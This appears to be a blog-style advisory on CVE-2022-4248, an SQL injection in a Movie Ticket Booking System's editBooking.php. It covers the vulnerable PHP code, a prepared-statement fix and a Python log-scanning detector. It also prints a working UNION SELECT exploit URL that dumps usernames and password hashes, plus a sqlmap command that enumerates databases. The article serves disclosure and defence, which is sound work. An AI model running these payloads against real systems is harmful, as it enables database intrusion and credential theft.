A critical vulnerability known as CVE-2022-4248 was discovered in the Movie Ticket Booking System, specifically in the editBooking.php file. This security flaw allows an attacker to manipulate the id parameter, leading to an SQL injection. Exploiting this vulnerability can give an attacker remote access to sensitive data, modify bookings, or even take full control of the database.

In this article, I’ll break down the vulnerability, show sample exploit code, discuss its risks, and include resources for further reading.

Exploit Status: Public

- Reference: VDB-214625

How Does the Vulnerability Work?

A common feature in booking systems is to allow users (or admins) to edit an existing booking, usually by specifying the booking id in the URL or form. In this case, the script neither validates nor sanitizes the id parameter before placing it in a SQL query. That lets an attacker inject arbitrary SQL into the query.

Here's a simplified version of the vulnerable PHP code, typically found in editBooking.php:

<?php
// Vulnerable code in editBooking.php
include('dbconnect.php');

$id = $_GET['id']; // no validation or sanitization

// Dangerous query - vulnerable to SQL injection!
$query = "SELECT * FROM bookings WHERE id = $id";
$result = mysqli_query($conn, $query);

// ...rest of the code
?>

If an attacker supplies something like id=1 OR 1=1, the query becomes:

SELECT * FROM bookings WHERE id = 1 OR 1=1

This will return all rows, not just the one intended booking. An attacker can do worse, such as extracting data from other tables.

Let’s walk through a real exploit scenario. Suppose the target site is

http://victim.com/editBooking.php?id=1

Exploit URL

http://victim.com/editBooking.php?id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users--

This payload attempts to dump usernames and password hashes from a users table. Depending on the code, this could be displayed directly in the bookings edit page, leaked in error messages, or exported by the attacker.

Automated Exploit with SQLMap

SQLMap is a popular tool for detecting and exploiting SQL injection.

Simple usage

sqlmap -u "http://victim.com/editBooking.php?id=1" --dbs

SQLMap will scan, confirm the injection, and enumerate all database names.

Any website running this Movie Ticket Booking System with the vulnerable editBooking.php is affected.

- The risk is especially high on a public server, since the exploit can be carried out remotely and has been publicly disclosed.

The fix is to stop interpolating the id into the query string and instead bind it as an integer parameter of a prepared statement, so the database never interprets it as SQL:

$id = (int) $_GET['id']; // cast to integer first; anything non-numeric becomes 0
$stmt = $conn->prepare("SELECT * FROM bookings WHERE id = ?");
$stmt->bind_param('i', $id); // 'i' means integer
$stmt->execute();
$result = $stmt->get_result();
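The same strict rule the patch enforces (an id is digits only) can also be used on the defensive side to spot attempts in web server logs. The following Python example is added here and is not part of the Movie Ticket Booking System or the original article; it applies the rule to constructed Common Log Format lines and reports requests to editBooking.php whose id parameter would not pass it.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Strict rule: a booking id is a non-empty string of ASCII digits.
# Anything else (spaces, quotes, keywords) would be interpreted as SQL
# when interpolated into "SELECT * FROM bookings WHERE id = $id".
ID_RE = re.compile(r"^[0-9]+$")

def is_valid_booking_id(raw):
    """Return True only if raw is a plain positive integer string."""
    return raw is not None and ID_RE.fullmatch(raw) is not None and int(raw) > 0

# Common Log Format: client ident user [ts] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

def suspicious_edit_booking_requests(log_lines):
    """Return (client, decoded_id) pairs for requests to editBooking.php
    whose id parameter fails the strict integer rule."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status = m.groups()
        parts = urlsplit(path)
        if not parts.path.endswith("/editBooking.php"):
            continue
        # parse_qs percent-decodes; keep_blank_values so "id=" is still reported
        raw_id = parse_qs(parts.query, keep_blank_values=True).get("id", [None])[0]
        if not is_valid_booking_id(raw_id):
            hits.append((client, raw_id))
    return hits

# Constructed sample log lines (not real traffic). The two entries from
# 10.0.0.9 mirror the payload shapes discussed in the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Dec/2022:08:15:00 +0000] "GET /editBooking.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Dec/2022:08:15:03 +0000] "GET /editBooking.php?id=1%20OR%201%3D1 HTTP/1.1" 200 9120',
    '10.0.0.9 - - [01/Dec/2022:08:15:07 +0000] "GET /editBooking.php?id=1%20UNION%20SELECT%201,username,password,4,5%20FROM%20users-- HTTP/1.1" 200 3044',
    '10.0.0.7 - - [01/Dec/2022:08:16:00 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 300',
    '10.0.0.8 - - [01/Dec/2022:08:16:10 +0000] "GET /editBooking.php?id= HTTP/1.1" 500 120',
]

if __name__ == "__main__":
    for client, raw in suspicious_edit_booking_requests(SAMPLE_LOG):
        print(f"{client}: editBooking.php id={raw!r}")
```

Only the three non-integer ids are reported; the legitimate request from 10.0.0.5 and the unrelated index.php request are not.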

More Information & Official References

- VulDB: VDB-214625 for CVE-2022-4248
- NVD: CVE-2022-4248
- SQL Injection Explained (OWASP)
- SQLMap Official Site

Conclusion

CVE-2022-4248 is a serious SQL injection vulnerability affecting the Movie Ticket Booking System. Due to the ease of exploitation and the potential data loss, it's important to patch immediately. This bug highlights how crucial it is to validate user input, especially when dealing with IDs in URLs or forms.

Stay safe & always sanitize your input!

*If you run this Movie Ticket Booking System, inspect your editBooking.php and patch it now. For more info on securing PHP apps, check out the OWASP Secure Coding Practices.*

Timeline

Published on: 12/01/2022 08:15:00 UTC
Last modified on: 12/02/2022 18:26:00 UTC